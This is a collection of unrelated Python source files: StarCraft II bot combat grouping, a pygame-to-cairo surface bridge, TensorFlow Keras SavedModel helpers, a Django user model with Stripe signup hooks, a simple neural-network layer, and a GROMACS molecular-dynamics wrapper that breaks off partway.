(i) img = mpimg.imread(img_file) result = annotate_image(img) plt.imshow(result) save_file = 'D:/code/github_code/CarND-Advanced-Lane-Lines-P4/output_images/test%d.jpg' % (i) if save_file is None: plt.show() else: plt.savefig(save_file) plt.gcf().clear()
python
from typing import List, Dict, Optional, Union from sharpy.combat import * from sharpy.general.extended_power import ExtendedPower from sharpy.interfaces import ICombatManager from sharpy.managers.core import UnitCacheManager, PathingManager, ManagerBase from sharpy.combat import Action from sc2.units import Units from sc2 import UnitTypeId from sc2.position import Point2, Point3 from sc2.unit import Unit import numpy as np from sklearn.cluster import DBSCAN ignored = {UnitTypeId.MULE, UnitTypeId.LARVA, UnitTypeId.EGG} class GroupCombatManager(ManagerBase, ICombatManager): rules: MicroRules def __init__(self): super().__init__() self.default_rules = MicroRules() self.default_rules.load_default_methods() self.default_rules.load_default_micro() self.enemy_group_distance = 7 async def start(self, knowledge: "Knowledge"): await super().start(knowledge) self.cache: UnitCacheManager = self.knowledge.unit_cache self.pather: PathingManager = self.knowledge.pathing_manager self._tags: List[int] = [] self.all_enemy_power = ExtendedPower(self.unit_values) await self.default_rules.start(knowledge) @property def tags(self) -> List[int]: return self._tags @property def regroup_threshold(self) -> float: """ Percentage 0 - 1 on how many of the attacking units should actually be together when attacking""" return self.rules.regroup_percentage @property def own_group_threshold(self) -> float: """ How much distance must be between units to consider them to be in different groups """ return self.rules.own_group_distance @property def unit_micros(self) -> Dict[UnitTypeId, MicroStep]: return self.rules.unit_micros @property def generic_micro(self) -> MicroStep: return self.rules.generic_micro async def update(self): self.enemy_groups: List[CombatUnits] = self.group_enemy_units() self.all_enemy_power.clear() for group in self.enemy_groups: # type: CombatUnits self.all_enemy_power.add_units(group.units) async def post_update(self): pass @property def debug(self): return self._debug and self.knowledge.debug def add_unit(self, unit: Unit): if unit.type_id in ignored: # Just no return self._tags.append(unit.tag) def add_units(self, units: Units): for unit in units: self.add_unit(unit) def get_all_units(self) -> Units: units = Units([], self.ai) for tag in self._tags: unit = self.cache.by_tag(tag) if unit: units.append(unit) return units def execute(self, target: Point2, move_type=MoveType.Assault, rules: Optional[MicroRules] = None): our_units = self.get_all_units() if len(our_units) < 1: return self.rules = rules if rules else self.default_rules self.own_groups: List[CombatUnits] = self.group_own_units(our_units) if self.debug: fn = lambda group: group.center.distance_to(self.ai.start_location) sorted_list = sorted(self.own_groups, key=fn) for i in range(0, len(sorted_list)): sorted_list[i].debug_index = i self.rules.handle_groups_func(self, target, move_type) self._tags.clear() def faster_group_should_regroup(self, group1: CombatUnits, group2: Optional[CombatUnits]) -> bool: if not group2: return False if group1.average_speed < group2.average_speed + 0.1: return False # Our group is faster, it's a good idea to regroup return True def regroup(self, group: CombatUnits, target: Union[Unit, Point2]): if isinstance(target, Unit): target = self.pather.find_path(group.center, target.position, 1) else: target = self.pather.find_path(group.center, target, 3) self.move_to(group, target, MoveType.Push) def move_to(self, group: CombatUnits, target, move_type: MoveType): self.action_to(group, target, move_type, False) def 
attack_to(self, group: CombatUnits, target, move_type: MoveType): self.action_to(group, target, move_type, True) def action_to(self, group: CombatUnits, target, move_type: MoveType, is_attack: bool): original_target = target if isinstance(target, Point2) and group.ground_units: if move_type in {MoveType.DefensiveRetreat, MoveType.PanicRetreat}: target = self.pather.find_influence_ground_path(group.center, target, 14) else: target = self.pather.find_path(group.center, target, 14) own_unit_cache: Dict[UnitTypeId, Units] = {} for unit in group.units: real_type = self.unit_values.real_type(unit.type_id) units = own_unit_cache.get(real_type, Units([], self.ai)) if units.amount == 0: own_unit_cache[real_type] = units units.append(unit) for type_id, type_units in own_unit_cache.items(): micro: MicroStep = self.unit_micros.get(type_id, self.generic_micro) micro.init_group(self.rules, group, type_units, self.enemy_groups, move_type, original_target) group_action = micro.group_solve_combat(type_units, Action(target, is_attack)) for unit in type_units: final_action = micro.unit_solve_combat(unit, group_action) final_action.to_commmand(unit) if self.debug: if final_action.debug_comment: status = final_action.debug_comment elif final_action.ability: status = final_action.ability.name elif final_action.is_attack: status = "Attack" else: status = "Move" if final_action.target is not None: if isinstance(final_action.target, Unit): status += f": {final_action.target.type_id.name}" else: status += f": {final_action.target}" status += f" G: {group.debug_index}" status += f"\n{move_type.name}" pos3d: Point3 = unit.position3d pos3d = Point3((pos3d.x, pos3d.y, pos3d.z + 2)) self.ai._client.debug_text_world(status, pos3d, size=10) def closest_group( self, start: Point2, combat_groups: List[CombatUnits], group_center: Optional[Point2] = None, distance: float = 50, ) -> Optional[CombatUnits]: group = None best_distance = distance # doesn't find enemy groups closer than this if group_center is None: group_center = start for combat_group in combat_groups: center = combat_group.center if center == group_center: continue # it's the same group! distance = start.distance_to(center) if distance < best_distance: best_distance = distance group = combat_group return group def group_own_units(self, units: Units) -> List[CombatUnits]: groups: List[Units] = [] # import time # ns_pf = time.perf_counter_ns() numpy_vectors: List[np.ndarray] = [] for unit in units: numpy_vectors.append(np.array([unit.position.x, unit.position.y])) if numpy_vectors: clustering = DBSCAN(eps=self.enemy_group_distance, min_samples=1).fit(numpy_vectors) # print(clustering.labels_) for index in range(0, len(clustering.labels_)): unit = units[index] if unit.type_id in self.unit_values.combat_ignore: continue label = clustering.labels_[index] if label >= len(groups): groups.append(Units([unit], self.ai)) else: groups[label].append(unit) # for label in clustering.labels_: # ns_pf = time.perf_counter_ns() - ns_pf # print(f"Own unit grouping (v2) took {ns_pf / 1000 / 1000} ms. 
groups: {len(groups)} units: {len(units)}") return [CombatUnits(u, self.knowledge) for u in groups] def group_enemy_units(self) -> List[CombatUnits]: groups: List[Units] = [] import time ns_pf = time.perf_counter_ns() if self.cache.enemy_numpy_vectors: clustering = DBSCAN(eps=self.enemy_group_distance, min_samples=1).fit(self.cache.enemy_numpy_vectors) # print(clustering.labels_) units = self.ai.all_enemy_units for index in range(0, len(clustering.labels_)): unit = units[index] if unit.type_id in self.unit_values.combat_ignore or not unit.can_be_attacked: continue label = clustering.labels_[index] if label >= len(groups): groups.append(Units([unit], self.ai)) else: groups[label].append(unit) # for label in clustering.labels_: ns_pf = time.perf_counter_ns() - ns_pf # print(f"Enemy unit grouping (v2) took {ns_pf / 1000 / 1000} ms. groups: {len(groups)}") return [CombatUnits(u, self.knowledge) for u in groups]
python
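# A standalone sketch (an assumption, not part of sharpy) of the grouping idea
# used by group_own_units/group_enemy_units above: unit positions are clustered
# with DBSCAN, eps matching enemy_group_distance (7) and min_samples=1 so every
# point receives a label and nearby points share one.
import numpy as np
from sklearn.cluster import DBSCAN

positions = np.array([[10.0, 10.0], [11.5, 10.5], [40.0, 42.0], [41.0, 41.0]])
clustering = DBSCAN(eps=7, min_samples=1).fit(positions)
groups = {}
for index, label in enumerate(clustering.labels_):
    groups.setdefault(label, []).append(positions[index])
print({label: len(members) for label, members in groups.items()})  # e.g. {0: 2, 1: 2}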
names = [] while True: name = input() if name == '.': break names.append(name) print(names) print(len(names))
python
import ctypes import cairo from pygame.rect import Rect def get_rect_by_size(upper_corner, size): return Rect(*upper_corner, size, size) PyBUF_READ = 0x100 PyBUF_WRITE = 0x200 def get_cairo_surface(pygame_surface): """ Black magic. """ class Surface(ctypes.Structure): _fields_ = [ ( 'HEAD', ctypes.c_byte * object.__basicsize__), ( 'SDL_Surface', ctypes.c_void_p)] class SDL_Surface(ctypes.Structure): _fields_ = [ ( 'flags', ctypes.c_uint), ( 'SDL_PixelFormat', ctypes.c_void_p), ( 'w', ctypes.c_int), ( 'h', ctypes.c_int), ( 'pitch', ctypes.c_ushort), ( 'pixels', ctypes.c_void_p)] surface = Surface.from_address(id(pygame_surface)) ss = SDL_Surface.from_address(surface.SDL_Surface) pixels_ptr = ctypes.pythonapi.PyMemoryView_FromMemory(ctypes.c_void_p(ss.pixels), ss.pitch * ss.h, PyBUF_WRITE) pixels = ctypes.cast(pixels_ptr, ctypes.py_object).value return cairo.ImageSurface.create_for_data(pixels, cairo.FORMAT_RGB24, ss.w, ss.h, ss.pitch)
python
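# A hedged usage sketch of get_cairo_surface above: wrap a pygame display
# surface and draw on it with cairo. Assumes pygame and pycairo are installed;
# the window size and rectangle are arbitrary.
import cairo
import pygame

pygame.init()
screen = pygame.display.set_mode((640, 480))
ctx = cairo.Context(get_cairo_surface(screen))
ctx.set_source_rgb(1.0, 0.0, 0.0)   # red
ctx.rectangle(50, 50, 200, 100)
ctx.fill()
pygame.display.flip()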
# Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Utility functions shared between SavedModel saving/loading implementations.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.keras import backend as K from tensorflow.python.keras.utils import tf_utils from tensorflow.python.util import tf_inspect def use_wrapped_call(layer, call_fn): """Creates fn that adds the losses returned by call_fn & returns the outputs. Args: layer: A Keras layer object call_fn: tf.function that takes layer inputs (and possibly a training arg), and returns a tuple of (outputs, list of losses). Returns: function that calls call_fn and returns the outputs. Losses returned by call_fn are added to the layer losses. """ training_arg_index = get_training_arg_index(layer) def wrapped_call(inputs, *args, **kwargs): """Returns the outputs from the call_fn, and adds the losses.""" if layer._expects_training_arg: # pylint: disable=protected-access training = get_training_arg(training_arg_index, args, kwargs) if training is None: training = K.learning_phase() args = list(args) kwargs = kwargs.copy() def replace_training_and_call(training): new_args, new_kwargs = set_training_arg(training, training_arg_index, args, kwargs) return call_fn(inputs, *new_args, **new_kwargs) outputs, losses = tf_utils.smart_cond( training, lambda: replace_training_and_call(True), lambda: replace_training_and_call(False)) else: outputs, losses = call_fn(inputs) layer.add_loss(losses, inputs) return outputs return wrapped_call def get_training_arg_index(layer): """Returns the index of 'training' in the layer call function arguments. Args: layer: Keras layer Returns: - n: index of 'training' in the call function arguments. - -1: if 'training' is not found in the arguments, but layer.call accepts variable keyword arguments - None: if layer doesn't expect a training argument. """ if not layer._expects_training_arg: # pylint: disable=protected-access return None arg_list = tf_inspect.getfullargspec(layer.call).args if tf_inspect.ismethod(layer.call): arg_list = arg_list[1:] if 'training' in arg_list: return arg_list.index('training') else: return -1 def set_training_arg(training, index, args, kwargs): if index is None: pass elif index >= 0 and len(args) > index: args[index] = training else: kwargs['training'] = training return args, kwargs def get_training_arg(index, args, kwargs): if index is None: return None elif index >= 0 and len(args) > index: return args[index] else: return kwargs.get('training', None)
python
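# A small sketch (not TensorFlow code) of how the training-argument helpers
# above behave, assuming they are in scope. index=1 corresponds to a
# call(self, inputs, training=None) signature once 'self' is dropped.
args, kwargs = set_training_arg(True, 1, [], {})
print(args, kwargs)                      # [] {'training': True}
args, kwargs = set_training_arg(False, 0, [True], {})
print(args, kwargs)                      # [False] {}
print(get_training_arg(0, [False], {}))  # False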
from django.conf import settings from django.contrib.auth.models import AbstractUser from django.db.models import CharField from django.db.models.signals import post_save from django.urls import reverse from django.utils.translation import gettext_lazy as _ from django.core.mail import EmailMultiAlternatives from django.dispatch import receiver from django.template.loader import render_to_string from django_rest_passwordreset.signals import reset_password_token_created import stripe stripe.api_key = settings.STRIPE_SECRET_KEY class User(AbstractUser): """ Default custom user model for mentors. If adding fields that need to be filled at user signup, check forms.SignupForm and forms.SocialSignupForms accordingly. """ #: First and last name do not cover name patterns around the globe name = CharField(_("Name of User"), blank=True, max_length=255) stripe_account_id = CharField(max_length=100) stripe_customer_id = CharField(max_length=100) def get_absolute_url(self): """Get url for user's detail view. Returns: str: URL for user detail. """ return reverse("users:detail", kwargs={"username": self.username}) def post_save_user_receiver(sender, instance, created, **kwargs): if created: instance.name = f"{instance.first_name} {instance.last_name}" account = stripe.Account.create( type='express', ) instance.stripe_account_id = account["id"] customer = stripe.Customer.create( email=instance.email, name=instance.name ) instance.stripe_customer_id = customer["id"] instance.save() # Avoid circular import from mentors.mentors.models import Mentor Mentor.objects.create(user=instance) post_save.connect(post_save_user_receiver, sender=User) @receiver(reset_password_token_created) def password_reset_token_created(sender, instance, reset_password_token, *args, **kwargs): """ Handles password reset tokens When a token is created, an e-mail needs to be sent to the user :param sender: View Class that sent the signal :param instance: View Instance that sent the signal :param reset_password_token: Token Model Object :param args: :param kwargs: :return: """ # send an e-mail to the user domain = "https://domain.com" if settings.DEBUG: domain = "http://localhost:3000" reset_password_url = domain + '/accounts/reset-password/confirm/' + reset_password_token.key context = { 'current_user': reset_password_token.user, 'username': reset_password_token.user.username, 'email': reset_password_token.user.email, 'reset_password_url': reset_password_url, 'domain': domain } # render email text email_html_message = render_to_string('email/user_reset_password.html', context) email_plaintext_message = render_to_string('email/user_reset_password.txt', context) msg = EmailMultiAlternatives( # title: "Password Reset for {title}".format(title="Mentors"), # message: email_plaintext_message, # from: "[email protected]", # to: [reset_password_token.user.email] ) msg.attach_alternative(email_html_message, "text/html") msg.send()
python
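# A hedged sketch of the signal flow above: creating a User fires
# post_save_user_receiver, which provisions a Stripe Express account and a
# Customer and creates the related Mentor. Requires a configured Django
# project with a valid STRIPE_SECRET_KEY; the field values are placeholders.
user = User.objects.create_user(
    username="jane",
    email="jane@example.com",
    first_name="Jane",
    last_name="Doe",
    password="change-me",
)
print(user.name, user.stripe_account_id, user.stripe_customer_id)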
import numpy as np class Neurons: def __init__(self, n_inputs, n_neurons): self.weights = 1 * np.random.randn(n_inputs, n_neurons) self.biases = np.zeros((1, n_neurons))
python
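# A usage sketch of the Neurons layer above: it only stores parameters, so the
# dense forward pass (inputs @ weights + biases) is written out explicitly.
# Layer and batch sizes are arbitrary.
import numpy as np

layer = Neurons(n_inputs=3, n_neurons=4)
batch = np.random.randn(2, 3)                         # 2 samples, 3 features
output = np.dot(batch, layer.weights) + layer.biases
print(output.shape)                                   # (2, 4)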
import abc import glob import logging import os import subprocess as sp from collections import OrderedDict from enum import Enum from paprika.utils import get_dict_without_keys from .simulation import Simulation logger = logging.getLogger(__name__) class GROMACS(Simulation, abc.ABC): """ A wrapper that can be used to set GROMACS simulation parameters. .. todo :: possibly modify this module to use the official python wrapper of GROMACS. Below is an example of the configuration file (``gromacs.mdp``) generated by the wrapper. The class property associated with defining the configuration variables is shown in brackets. .. code :: title = NPT MD Simulation ; [self.title] ; Run control [self.control] nsteps = 1500000 nstxout = 500 nstlog = 500 nstenergy = 500 nstcalcenergy = 500 dt = 0.002 integrator = md ; Nonbonded options [self.nb_method] cutoff-scheme = Verlet ns_type = grid nstlist = 10 rlist = 0.9 rcoulomb = 0.9 rvdw = 0.9 coulombtype = PME pme_order = 4 fourierspacing = 0.16 vdwtype = Cut-off DispCorr = EnerPres pbc = xyz ; Bond constraints [self.constraints] constraint-algorithm = lincs constraints = h-bonds lincs_iter = 1 lincs_order = 4 ; Temperature coupling [self.thermostat] tcoupl = v-rescale tc-grps = System ref_t = 298.15 tau_t = 0.1 gen_vel = no ; Pressure coupling [self.barostat] pcoupl = Berendsen pcoupltype = isotropic tau_p = 2.0 ref_p = 1.01325 compressibility = 4.5e-05 """ class Thermostat(Enum): """ An enumeration of the different themostat implemented in GROMACS. """ Off = "no" Berendsen = "berendsen" NoseHoover = "nose-hoover" Andersen1 = "andersen" Andersen2 = "andersen-massive" VelocityRescaling = "v-rescale" class Barostat(Enum): """ An enumeration of the different barostat implemented in GROMACS. """ Off = "no" Berendsen = "Berendsen" ParrinelloRahman = "Parrinello-Rahman" MMTK = "MTTK" class Integrator(Enum): """ An enumeration of the different integrators implemented in GROMACS. """ LeapFrog = "md" VelocityVerlet = "md-vv" VelocityVerletAveK = "md-vv-avek" LangevinDynamics = "sd" BrownianDynamics = "bd" class Optimizer(Enum): """ An enumeration of the different minimization algorithm implemented in GROMACS. """ SteepestDescent = "steep" ConjugateGradient = "cg" Broyden = "l-bfgs" class BoxScaling(Enum): """ An enumeration of the different PBC scaling options when running constant pressure simulations in GROMACS. """ Isotropic = "isotropic" Semiisotropic = "semiisotropic" Anisotropic = "anisotropic" SurfaceTension = "surface-tension" class Constraints(Enum): """ An enumeration of the different bond constraint options in GROMACS. """ Off = "none" HBonds = "h-bonds" AllBonds = "all-bonds" HAngles = "h-angles" AllAngles = "all-angles" @property def index_file(self) -> str: """os.PathLike: GROMACS index file that specifies ``groups`` in the system. 
This is optional in a GROMACS simulation.""" return self._index_file @index_file.setter def index_file(self, value: str): self._index_file = value @property def checkpoint(self) -> str: """os.PathLike: Checkpoint file (extension is ``.cpt``) for starting a simulation from a previous state.""" return self._checkpoint @checkpoint.setter def checkpoint(self, value: str): self._checkpoint = value @property def control(self): """dict: Dictionary for the output control of the MD simulation (frequency of energy, trajectory etc).""" return self._control @control.setter def control(self, value): self._control = value @property def nb_method(self): """dict: Dictionary for the non-bonded method options (cutoffs and methods).""" return self._nb_method @nb_method.setter def nb_method(self, value): self._nb_method = value @property def constraints(self): """dict: Dictionary for the bond constraint options (LINCS or SHAKE).""" return self._constraints @constraints.setter def constraints(self, value): self._constraints = value @property def tc_groups(self) -> list: """ list: List of groups to apply thermostat "separately" based on the groups defined in the ``index_file``. Below is an example of applying the thermostat for different groups separately in a GROMACS input file .. code :: tcoupl = v-rescale tc-grps = HOST GUEST HOH tau-t = 0.1 0.1 0.1 ref-t = 300 300 300 """ return self._tc_groups @tc_groups.setter def tc_groups(self, value: list): self._tc_groups = value @property def prefix(self): """str: The prefix for file names generated from this simulation.""" return self._prefix @prefix.setter def prefix(self, new_prefix): self._prefix = new_prefix self.input = new_prefix + ".mdp" self.output = new_prefix + ".mdout" self.logfile = new_prefix + ".log" self.tpr = new_prefix + ".tpr" @property def custom_mdrun_command(self) -> str: """Custom commands for ``mdrun``. The default commands parsed to ``mdrun`` if all the variables are defined is .. code:: gmx mdrun -deffnm ``prefix`` -nt ``n_threads`` -gpu_id ``gpu_devices`` -plumed ``plumed.dat`` This is useful depending on how GROMACS was compiled, e.g. if GROMACS is compiled with the MPI library the you will need to use the command below: .. code:: mpirun -np 6 gmx_mpi mdrun -deffnm ``prefix`` -ntomp 1 -gpu_id 0 -plumed ``plumed.dat`` """ return self._custom_mdrun_command @custom_mdrun_command.setter def custom_mdrun_command(self, value: str): self._custom_mdrun_command = value @property def grompp_maxwarn(self) -> int: """int: Maximum number of warnings for GROMPP to ignore. 
default=1.""" return self._grompp_maxwarn @grompp_maxwarn.setter def grompp_maxwarn(self, value: int): self._grompp_maxwarn = value def __init__(self): super().__init__() # I/O self._index_file = None self._custom_mdrun_command = None self._tc_groups = None self._grompp_maxwarn = 1 # File names self.input = self._prefix + ".mdp" self.output = self._prefix + ".mdout" self._checkpoint = None self.logfile = self._prefix + ".log" self.tpr = self._prefix + ".tpr" # Input file self._control = OrderedDict() self._control["nsteps"] = 5000 self._control["nstxout"] = 500 self._control["nstlog"] = 500 self._control["nstenergy"] = 500 self._control["nstcalcenergy"] = 500 self._constraints = OrderedDict() self._constraints["constraint-algorithm"] = "lincs" self._constraints["constraints"] = self.Constraints.HBonds.value self._constraints["lincs_iter"] = 1 self._constraints["lincs_order"] = 4 self._nb_method = OrderedDict() self._nb_method["cutoff-scheme"] = "Verlet" self._nb_method["ns-type"] = "grid" self._nb_method["nstlist"] = 10 self._nb_method["rlist"] = 0.9 self._nb_method["rcoulomb"] = 0.9 self._nb_method["rvdw"] = 0.9 self._nb_method["coulombtype"] = "PME" self._nb_method["pme_order"] = 4 self._nb_method["fourierspacing"] = 0.16 self._nb_method["vdwtype"] = "Cut-off" self._nb_method["DispCorr"] = "EnerPres" self._nb_method["pbc"] = "xyz" def _config_min(self, optimizer): """ Configure input settings for a minimization run. Parameters ---------- optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent Algorithm for energy minimization, keyword in the parenthesis are the options for the input file. **(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden` (``l-bfgs``). """ self.constraints["continuation"] = "no" self.control["integrator"] = optimizer.value self.control["emtol"] = 10.0 self.control["emstep"] = 0.01 self.control["nsteps"] = 5000 def _config_md(self, integrator, thermostat): """ Configure input setting for a MD. Parameters ---------- integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``), **(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)** `Brownian Dynamics` (``bd``). integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``), **(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)** `Brownian Dynamics` (``bd``). """ self.control["dt"] = 0.002 self.control["integrator"] = integrator.value self.constraints["continuation"] = "yes" self.thermostat["tc-grps"] = "System" self.thermostat["ref_t"] = self.temperature if ( integrator != self.Integrator.LangevinDynamics and integrator != self.Integrator.BrownianDynamics ): self.thermostat["tcoupl"] = thermostat.value self.thermostat["tau_t"] = 1.0 else: self.thermostat["tau_t"] = 0.1 def config_vac_min(self, optimizer=Optimizer.SteepestDescent): """ Configure a reasonable input setting for a MD run in vacuum. `Users can override the parameters set by this method.` .. note :: Newer versions of GMX no longer support a "True" vacuum simulation so we have to do this by creating a "pseudo-PBC" environment. 
Make sure the coordinates ``.gro`` file has an expanded box, which you can do using ``gmx editconf``. See the discussion on https://gromacs.bioexcel.eu/t/minimization-in-vacuum-without-pbc/110/2. Parameters ---------- optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent Algorithm for energy minimization, keyword in the parenthesis are the options for the input file. **(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden` (``l-bfgs``). """ self.title = "Vacuum Minimization" self._config_min(optimizer) self.nb_method["pbc"] = "xyz" self.nb_method["ns_type"] = "grid" self.nb_method["nstlist"] = 10 self.nb_method["rlist"] = 333.3 self.nb_method["coulombtype"] = "Cut-off" self.nb_method["rcoulomb"] = 333.3 self.nb_method["vdwtype"] = "Cut-off" self.nb_method["rvdw"] = 333.3 self.nb_method["DispCorr"] = "no" def config_vac_md( self, integrator=Integrator.LeapFrog, thermostat=Thermostat.VelocityRescaling ): """ Configure a reasonable input setting for a MD run in vacuum. `Users can override the parameters set by this method.` .. note :: Newer versions of GMX no longer support a "True" vacuum simulation so we have to do this by creating a "pseudo-PBC" environment. Make sure the coordinates ``.gro`` file has an expanded box, which you set using ``gmx editconf``. See the discussion on https://gromacs.bioexcel.eu/t/minimization-in-vacuum-without-pbc/110/2. Parameters ---------- integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``), **(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)** `Brownian Dynamics` (``bd``). thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling Option to choose one of five thermostat implemented in GROMACS, keywords in the parenthesis are the options for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover` (``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``), and **(6)** `VelocityRescaling` (``v-rescale``). """ self.title = "Vacuum MD Simulation" self._config_md(integrator, thermostat) if self.checkpoint is None: self.constraints["continuation"] = "no" else: self.constraints["continuation"] = "yes" self.nb_method["pbc"] = "xyz" self.nb_method["ns_type"] = "grid" self.nb_method["nstlist"] = 10 self.nb_method["rlist"] = 333.3 self.nb_method["coulombtype"] = "Cut-off" self.nb_method["rcoulomb"] = 333.3 self.nb_method["vdwtype"] = "Cut-off" self.nb_method["rvdw"] = 333.3 self.nb_method["DispCorr"] = "no" def config_pbc_min(self, optimizer=Optimizer.SteepestDescent): """ Configure a reasonable input setting for an energy minimization run with periodic boundary conditions. `Users can override the parameters set by this method.` Parameters ---------- optimizer: :class:`GROMACS.Optimizer`, default=Optimizer.SteepestDescent Algorithm for energy minimization, keywords in the parenthesis are the options for the input file. **(1)** `SteepestDescent` (``steep``), **(2)** `ConjugateGradient` (``cg``), and **(3)** `Broyden` (``l-bfgs``). 
""" self.title = "PBC Minimization" self._config_min(optimizer) self.nb_method["nstlist"] = 10 def config_pbc_md( self, ensemble=Simulation.Ensemble.NPT, integrator=Integrator.LeapFrog, thermostat=Thermostat.VelocityRescaling, barostat=Barostat.Berendsen, ): """ Configure a reasonable input setting for a MD run with periodic boundary conditions. `Users can override the parameters set by this method.` Parameters ---------- ensemble: :class:`Simulation.Ensemble`, default=Ensemble.NPT Configure a MD simulation with NVE, NVT or NPT thermodynamic ensemble. integrator: :class:`GROMACS.Integrator`, default=Integrator.LeapFrog Option to choose the integrator for the MD simulations, keywords in the parenthesis are the options for the input file. **(1)** `LeapFrog` (``md``), **(2)** `VelocityVerlet` (``md-vv``), **(3)** `VelocityVerletAveK` (``md-vv-avek``), **(4)** `LangevinDynamics` (``sd``), and **(5)** `Brownian Dynamics` (``bd``). thermostat: :class:`GROMACS.Thermostat`, default=Thermostat.VelocityRescaling Option to choose one of five thermostat implemented in GROMACS, keywords in the parenthesis are the options for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `NoseHoover` (``nose-hoover``), **(4)** `Andersen1` (``andersen``), **(5)** `Andersen2` (``andersen-massive``), and **(6)** `VelocityRescaling` (``v-rescale``). barostat: :class:`GROMACS.Barostat`, default=Barostat.Berendsen Option to choose one of three barostat implemented in GROMACS, keywords in the parenthesis are the options for the input file. **(1)** `Off` (``no``), **(2)** `Berendsen` (``berendsen``), **(3)** `ParrinelloRahman` (``Parrinello-Rahman``), and **(4)** `MMTK` (``MTTK``). """ self.title = f"{ensemble.value} MD Simulation" self._config_md(integrator, thermostat) if self.checkpoint is None: self.constraints["continuation"] = "no" else: self.constraints["continuation"] = "yes" if ensemble == self.Ensemble.NVE: self.thermostat["tcoupl"] = self.Thermostat.Off.value self.barostat["pcoupl"] = self.Barostat.Off.value del self.thermostat["tc-grps"] del self.thermostat["ref_t"] del self.thermostat["tau_t"] elif ensemble == self.Ensemble.NVT: self.thermostat["gen_vel"] = "yes" self.thermostat["gen_temp"] = self.temperature self.thermostat["gen_seed"] = -1 self.barostat["pcoupl"] = self.Barostat.Off.value elif ensemble == self.Ensemble.NPT: self.thermostat["gen_vel"] = "no" self.barostat["pcoupl"] = barostat.value if barostat.value != self.Barostat.Off: self.barostat["pcoupltype"] = self.BoxScaling.Isotropic.value self.barostat["tau_p"] = 2.0 self.barostat["ref_p"] = self.pressure self.barostat["compressibility"] = 4.5e-5 @staticmethod def _write_dict_to_mdp(f, dictionary): """ Write dictionary to file, following GROMACS format. Parameters ---------- f : TextIO File where the dictionary should be written. dictionary : dict Dictionary of values. """ for key, val in dictionary.items(): if val is not None and not isinstance(val, list): f.write("{:25s} {:s}\n".format(key, "= " + str(val))) elif isinstance(val, list): f.write("{:25s} {:s}".format(key, "= ")) for i in val: f.write("{:s} ".format(str(i))) f.write("\n") def _write_input_file(self): """ Write the input file specification to file. 
""" logger.debug("Writing {}".format(self.input)) with open(os.path.join(self.path, self.input), "w") as mdp: mdp.write("{:25s} {:s}\n".format("title", "= " + self.title)) mdp.write("; Run control\n") self._write_dict_to_mdp(mdp, self.control) mdp.write("; Nonbonded options\n") self._write_dict_to_mdp(mdp, self.nb_method) mdp.write("; Bond constraints\n") if self.constraints["constraint-algorithm"].lower() == "shake": self._write_dict_to_mdp( mdp, get_dict_without_keys( self.constraints, "lincs_iter", "lincs_order" ), ) else: self._write_dict_to_mdp(mdp, self.constraints) if self.thermostat: mdp.write("; Temperature coupling\n") # Check if users specify different temperature groups if self.tc_groups: tau_t = self.thermostat["tau_t"] self.thermostat["tc-grps"] = self.tc_groups self.thermostat["tau_t"] = [tau_t] * len(self.tc_groups) self.thermostat["ref_t"] = [self.temperature] * len(self.tc_groups) self._write_dict_to_mdp(mdp, self.thermostat) if self.barostat: mdp.write("; Pressure coupling\n") self._write_dict_to_mdp(mdp, self.barostat) def run(self, run_grompp=True, overwrite=False, fail_ok=False): """ Method to run Molecular Dynamics simulation with GROMACS. Parameters ---------- run_grompp: bool, optional, default=True Run GROMPP to generate ``.tpr`` file before running MDRUN overwrite: bool, optional, default=False Whether to overwrite simulation files. fail_ok: bool, optional, default=False Whether a failing simulation should stop execution of ``pAPRika``. """ if overwrite or not self.check_complete(): # Check the type of simulation: Minimization, NVT or NPT if self.control["integrator"] in [ self.Optimizer.SteepestDescent.value, self.Optimizer.ConjugateGradient.value, self.Optimizer.Broyden.value, ]: logger.info("Running Minimization at {}".format(self.path)) elif self.control["integrator"] in [ self.Integrator.LeapFrog.value, self.Integrator.VelocityVerlet.value, self.Integrator.VelocityVerletAveK.value, self.Integrator.LangevinDynamics.value, self.Integrator.BrownianDynamics.value, ]: if self.thermostat and self.barostat: logger.info("Running NPT MD at {}".format(self.path)) elif not self.barostat: logger.info("Running NVT MD at {}".format(self.path)) else: logger.info("Running NVE MD at {}".format(self.path)) # Set Plumed kernel library to path self._set_plumed_kernel() # create executable list for GROMPP # gmx grompp -f npt.mdp -c coordinates.gro -p topology.top -t checkpoint.cpt -o npt.tpr -n index.ndx if run_grompp: # Clean previously generated files for file in glob.glob(os.path.join(self.path, f"{self.prefix}*")): os.remove(file) # Write MDF input file self._write_input_file() # GROMPP list grompp_list = [self.executable, "grompp"] 